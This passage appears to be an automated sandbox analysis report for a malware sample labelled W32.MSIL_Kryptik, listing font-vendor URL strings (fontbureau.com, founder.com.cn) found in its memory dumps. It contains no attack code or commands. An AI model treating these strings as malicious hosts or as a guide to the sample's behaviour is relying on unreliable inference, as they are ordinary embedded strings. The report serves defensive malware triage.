00000001.00000003.355787965.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355587469.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355263828.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354866721.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354138837.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.352677508.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354002677.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353023886.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353202982.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354748764.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356055521.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355370104.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355735494.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comce/li
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353734380.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354215467.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354138837.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354002677.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353944829.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353874368.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354300800.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comcomF8hd
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353734380.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354215467.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353609947.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354138837.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354002677.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353944829.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353874368.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354300800.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comcoma
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355070094.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355923706.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355479066.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355787965.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355587469.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355263828.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354866721.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356055521.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355370104.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355735494.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354957925.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356140272.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355132775.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comcomdHi
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354659505.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comdHi
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355070094.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355923706.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355479066.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355787965.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355587469.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355263828.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356055521.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355370104.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355735494.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354957925.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356140272.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355132775.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comitut
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356730100.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356246616.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355070094.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355923706.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355479066.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356349017.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355787965.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355587469.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355263828.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356587981.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356055521.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355370104.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355735494.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354957925.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356140272.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356879747.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355132775.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356497695.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comm
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362640132.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362961626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437323044.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362717209.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362577996.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.363105723.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362852283.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.commvali
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362640132.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362961626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437323044.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362717209.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362577996.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.363105723.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362852283.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comm~i
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353734380.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353609947.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353023886.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353202982.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353944829.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.352949197.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353439899.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353874368.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353305139.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comoitu
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.352028891.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comsief
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354483757.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353734380.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354215467.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353609947.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354138837.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354002677.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354421323.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353944829.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353874368.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354300800.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comt
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347663096.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347164026.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348081227.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348700807.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348291004.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346883664.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346586583.0000000005F64000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348852099.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348167056.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347319272.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347028490.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346759481.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347907945.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346500462.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347609249.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347463858.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347791626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348471851.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347092731.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347663096.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347164026.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348081227.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348700807.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348291004.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346883664.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348167056.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347319272.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347028490.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346759481.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347907945.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347609249.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347463858.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347791626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348471851.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347092731.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346973547.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347557474.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347203168.0000000005F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn)
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346182160.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346883664.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346256859.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347028490.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346759481.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347092731.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346973547.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346759481.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/7
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346883664.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347028490.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346759481.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346973547.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346639113.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cnCCy
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346883664.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347028490.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346759481.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346973547.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346639113.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cnQ
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346586583.0000000005F64000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346500462.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cnhkPs
